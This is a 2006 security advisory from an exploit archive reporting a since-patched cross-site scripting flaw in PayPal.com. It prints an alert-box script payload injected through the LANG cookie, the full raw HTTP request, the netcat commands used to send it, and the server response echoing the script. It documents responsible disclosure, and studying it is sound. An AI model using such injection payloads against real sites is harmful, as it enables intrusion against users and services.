Home / exploitsPDF  

paypalXSScorry.txt

Posted on 07 November 2006

-=[--------------------ADVISORY-------------------]=- PayPal.com Author:CorryL x0n3-h4ck.org -=[----------------------------------------------------]=- -=[+] Application: PayPal.com -=[+] Version: -=[+] Vendor's URL: www.paypal.com -=[+] Platform: LinuxUnix -=[+] Bug type: XSS -=[+] Exploitation: Remote/Local -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL ..::[ Descriprion ]::.. Founded in 1998, PayPal, an eBay Company, enables any individual or business with an email address to securely, easily and quickly send and receive payments online. PayPal's service builds on the existing financial infrastructure of bank accounts and credit cards and utilizes the world's most advanced proprietary fraud prevention systems to create a safe, global, real-time payment solution. PayPal has quickly become a global leader in online payment solutions with 100 million account members worldwide. Available in 103 countries and regions around the world, buyers and sellers on eBay, online retailers, online businesses, as well as traditional offline businesses are transacting with PayPal. ..::[ Proof Of Concept ]::.. The problem is in a contained variable on the cookies that come saved on a system client, I have used a small software "NetCat" for the dispatch of the application to the web containing server the lace, what it would allow the xss. I have used a line of code that visualizes a small window of containing alert of the numbers. <ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt> I have passed to the varying LANG in this way: LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt> this is a request, that I have passed server to the web, complete of the code that would allow the xss: GET / HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.paypal.com Cookie: cookie_check=yes;feel_cookie=6120302020622030202063203620776562736372206 4203020206520323120686F6D65706167652F486F6D65506167652E78736C20662030202 067203520656E5F55532068203020206920313920702F77656C2F696E6465782D6F75747 3696465206A203020206B2031362057656C636F6D65202D2050617950616C206C2030202 0;Apache=87%2E18%2E96%2E17%2E100421159849159546;KHcl0EuY7AKSMgfvHl7J5E7h PtK=3pnRPwTbH4N6EEpxzwWWs3Mc2y2H-hH53D2MVeXyVDl4MsVrDF4cjRE3XSmD3RB714PL N69ovbjK--4R;HaC80bwXscjqZ7KM6VOxULOB534=111-222-1933email@address.com;p pip_signup=1;LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>;7aMa j2jiaNMgvUAKlwbL1LlbnqC=BCRwX6rFzy8UFpNf7im0msjTqBkC71Yeq3U8IKjQG4zGrhRy i5YDJ7sCXUdmJRHDye3Pjm;fL2JBKjxujhcE4LvqIWvGu9H2DC=r-h3XHZ9sxeAYLHHkSjI4 rXDaIB_JYsnEcx5svkMqiEPXWXCIaM-O-gNRkcj1K4tS5pPr4xtYC_3hZUBCMQ6b4xw8Tm;t est_cookie=CheckForPermission;HumanClickID=-1902375092086;HumanClickACTI VE=1159849210089;HumanClickKEY=2113911440409354850;BEGINREJECT=115984951 1214ENDREJECT Connection: Close Pragma: no-cache following I glue the answer of the server: nc www.paypal.com 80 < prova.txt HTTP/1.1 200 OK Date: Fri, 06 Oct 2006 17:23:13 GMT Server: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.22 OpenSSL/0.9.7e Cache-Control: private Expires: Thu, 05 Jan 1995 22:00:00 GMT Pragma: no-cache Set-Cookie: feel_cookie=61203020206220302020632036207765627363722064203620776562 736372206520323120686F6D65706167652F486F6D65506167652E78736C20662032312 0686F6D65 706167652F486F6D65506167652E78736C2067203431202D2D3E3C536352695074200A0 D3E616C65 72742831323334353637383930293B3C2F5363526950743E2068203520656E5F5553206 920313920 702F77656C2F696E6465782D6F757473696465206A20313920702F77656C2F696E64657 82D6F7574 73696465206B203020206C2031362057656C636F6D65202D2050617950616C20; expires=Sat, 0 6-Oct-2007 17:23:14 GMT; path=/; domain=.paypal.com Set-Cookie: Apache=87.18.110.213.321561160155393836; path=/; expires=Sun, 28-Sep -36 17:23:13 GMT Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <!-- Script info: script: webscr, cmd: , template: p/wel/index-outside, date: Oct. 3, 2006 12:18:04 PDT; country: US, language: --><ScRiPt>alert(1234567890);</ScRiPt> web version: 42.0-255538 branch: live-420_int content version: 42.0-249796 branch: live-420_int --> <title>PayPal - Abort</title> As he is able well to see the server responds and it inserts the line of code among the output of the page, allowing the opening of the window of alert. We can save the answer of the server on a page in formed html and to open her/it with an any browsers to ascertain how much I dictate, using same NetCat, in this way: nc www.paypal.com 80 < test.txt > aaa.html ..::[ Disclousure Timeline ]::.. [04/10/2006] - Vendor notification [08/10/2006] - Vendor Response [18/10/2006] - Patch relase from vendor [04/11/2006] - Public disclousure ********************* Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB! Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html

 

TOP